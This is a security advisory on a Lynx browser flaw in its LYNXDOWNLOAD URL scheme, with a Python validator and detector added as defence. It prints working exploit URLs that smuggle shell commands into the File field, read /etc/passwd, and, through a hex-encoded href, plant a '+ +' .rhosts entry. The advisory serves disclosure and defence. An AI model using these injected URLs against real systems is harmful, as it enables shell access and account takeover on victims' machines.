COMMAND

    lynx

SYSTEMS AFFECTED

    Systems running lynx

PROBLEM

    When you  start up  a lynx  client session,  you can  hit "g" (for
    Goto) and then enter the following URL:

        URL to open: LYNXDOWNLOAD://Method=-1/File=/dev/null;/bin/sh;/SugFile=/dev/null
        Enter a filename: /dev/null
        File exists. Overwrite? (y/n) y

    This then gives a  shell on the client  machine on which the  lynx
    process is executing.

    Similarly, you can copy and  inspect arbitrary files on the  local
    system thus:

        LYNXDOWNLOAD://Method=-1/File=/etc/passwd/SugFile=/dev/stdout
        Enter a filename: /dev/stdout
        File exists. Overwrite? (y/n) y

    This returns a copy of the /etc/passwd file to the user's browser
    session.  Normally this may not be a problem if you are executing
    lynx from your local account on your workstation.

    However, if you are running lynx as a captive information service
    (as discussed on the lynx man page), this means that an attacker
    can run arbitrary commands and inspect arbitrary files on the
    victim system without authorization.  Credit goes to CERT and an
    unknown reporter.

    Michal Zalewski added the following very big, ugly remote hole:

        <a href="LYNXDOWNLOAD://Method=-1/File=/dev/null`%65%63%68%6f%20%2b%20%2b%3e%7e%2f%2e%72%68%6f%73%74%73%0a`/SugFile=test">
        CLICK HERE</a>

    The href exploit above executes "echo + +>~/.rhosts" (the
    percent-escaped string between the backticks decodes to that
    command).

SOLUTION

    The reporter suggested that disabling downloads would be an
    appropriate workaround.  The 'rhosts' exploit is eliminated in Lynx
    version 2.7.1ac-0.35, released on June 26, 1997.  In Lynx version
    2.7.1ac-0.35 and later, the following message is displayed when you
    try to follow a potentially malicious link like the one above:

        Alert!: This special URL is not allowed in external documents!
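    As an added illustration (example code, not Lynx source), the check
    below models the two layers of defence this advisory points at: the
    2.7.1ac-0.35 rule that refuses a special URL arriving from an external
    document, and, as an assumed defence in depth, a refusal of File= and
    SugFile= values that carry shell metacharacters once percent-escapes
    are decoded, plus a detector that lists special-scheme hrefs in fetched
    HTML.  Function names and the metacharacter set are this example's own.

```python
import re
from urllib.parse import unquote

# Lynx-internal "special" scheme the advisory concerns (lower-cased for matching).
SPECIAL_SCHEMES = {"lynxdownload"}

# Characters that let a File= value break out into a shell command line
# (this example's own list, not taken from Lynx).
SHELL_META = set(";|&`$<>\n\"'\\")

# Message Lynx 2.7.1ac-0.35 displays for a special URL found in an external document.
EXTERNAL_MSG = "Alert!: This special URL is not allowed in external documents!"

# Field layout shown in the advisory: Method=.../File=.../SugFile=...
# File= may itself contain slashes, so match up to the next "/SugFile=".
_FIELDS = re.compile(r"^Method=([^/]*)/File=(.*?)/SugFile=(.*)$")

def parse_lynxdownload(url):
    """Split a LYNXDOWNLOAD URL into its fields, percent-decoding the values
    (hex escapes in an href reach the shell decoded).  None if not one."""
    scheme, sep, rest = url.partition("://")
    if not sep or scheme.lower() != "lynxdownload":
        return None
    m = _FIELDS.match(rest)
    if not m:
        return None
    return {"Method": m.group(1), "File": unquote(m.group(2)),
            "SugFile": unquote(m.group(3))}

def check_special_url(url, from_external_document):
    """Decide whether the client may act on url.  Returns (allowed, reason)."""
    if url.partition("://")[0].lower() not in SPECIAL_SCHEMES:
        return True, "not a special URL"
    if from_external_document:
        return False, EXTERNAL_MSG          # the 2.7.1ac-0.35 rule
    fields = parse_lynxdownload(url)
    if fields is None:
        return False, "malformed LYNXDOWNLOAD URL"
    for key in ("File", "SugFile"):
        # Defence in depth (assumed, not a Lynx rule): never pass shell
        # metacharacters on, even for a URL typed locally at the "g" prompt.
        if SHELL_META & set(fields[key]):
            return False, "shell metacharacter in %s" % key
    return True, "ok"

def find_special_links(html):
    """Detection: hrefs in a fetched document that use a special scheme."""
    hrefs = re.findall(r'href\s*=\s*"([^"]*)"', html, re.I)
    return [h for h in hrefs if h.partition("://")[0].lower() in SPECIAL_SCHEMES]
```

    The /etc/passwd URL passes the metacharacter check when typed locally,
    matching the advisory's point that reading local files only matters in
    the captive-service case; the external-document rule is what closes it.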